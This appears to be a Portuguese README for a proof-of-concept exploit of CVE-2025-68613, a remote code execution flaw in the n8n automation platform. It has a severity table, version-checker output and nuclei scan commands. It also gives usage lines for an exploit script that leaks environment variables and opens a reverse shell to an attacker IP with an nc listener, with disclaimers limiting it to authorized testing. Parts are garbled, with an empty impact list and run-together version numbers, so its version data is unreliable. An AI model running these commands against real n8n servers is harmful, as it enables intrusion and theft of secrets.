
CVE-2025-68613

Severidade: 🔴 Crítico Impacto: Execução Remota de Código Plataforma Afetada: n8n (automação de fluxos de trabalho)
CVE-2025-68613 é uma vulnerabilidade de segurança crítica no n8n, uma plataforma open-source de automação de fluxos de trabalho. O problema permite que um atacante autenticado execute código arbitrário no servidor ao abusar da forma como as expressões de fluxos de trabalho são avaliadas.
💥 Por que é perigoso: Expressões maliciosas são avaliadas em um contexto que não é devidamente isolado (sandbox), permitindo acesso ao runtime subjacente.

Se explorada, um atacante poderia:
O ataque é executado com os mesmos privilégios do serviço n8n, amplificando seu impacto.
| Métrica | Valor |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| Confidencialidade | Alta |
| Integridade | Alta |
| Disponibilidade | Alta |
➡️ A autenticação é necessária, mas nenhum acesso de administrador é preciso.
🚫 Vulneráveis:
0.211.0 → 1.120.31.121.0✅ Corrigidas:
1.120.41.121.11.122.0 e versões posteriores(NÃO remove completamente a vulnerabilidade)
| Categoria | Informação |
|---|---|
| ID CVE | CVE-2025-68613 |
| Produto | n8n |
| Classe de Bug | Injeção de Expressão |
| Resultado | Execução Remota de Código |
| Acesso Necessário | Usuário autenticado |
| Correção Disponível | Sim |
CVE-2025-68613.py — Verificador Remoto de Versão e Exposição (Seguro)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
Ou, se preferir verificar uma lista de hosts, execute:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
Exemplo de Saída

Exemplos de uso:
Vazar variáveis de ambiente:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
Obter informações do usuário:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
Reverse shell (inicie o listener primeiro: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
Este script destina-se apenas a testes de segurança autorizados em sistemas que você possui ou para os quais tem permissão explícita para testar.
🔒 Este script é um Proof-of-Concept (PoC) de exploração da CVE-2025-68613 no n8n.
📚 Ele é fornecido estritamente para fins educacionais e apenas para testes de segurança autorizados.
🛡️ Use exclusivamente em sistemas que você possui, controla ou para os quais tenha permissão explícita por escrito para testar.
🚫 O uso não autorizado contra qualquer sistema é ilegal e pode violar leis (por exemplo, leis de fraude e abuso de computadores).
❌ O autor e quaisquer partes associadas não assumem nenhuma responsabilidade por uso indevido, danos ou consequências legais.
✅ Use com responsabilidade, ética e em total conformidade com todas as leis e regulamentos aplicáveis.
🔐 Se realizar testes de penetração, garanta que a devida autorização (por exemplo, Regras de Engajamento) esteja em vigor.
🛠️ Pesquisadores de segurança podem usar isto para verificar vulnerabilidades e incentivar a aplicação rápida de correções.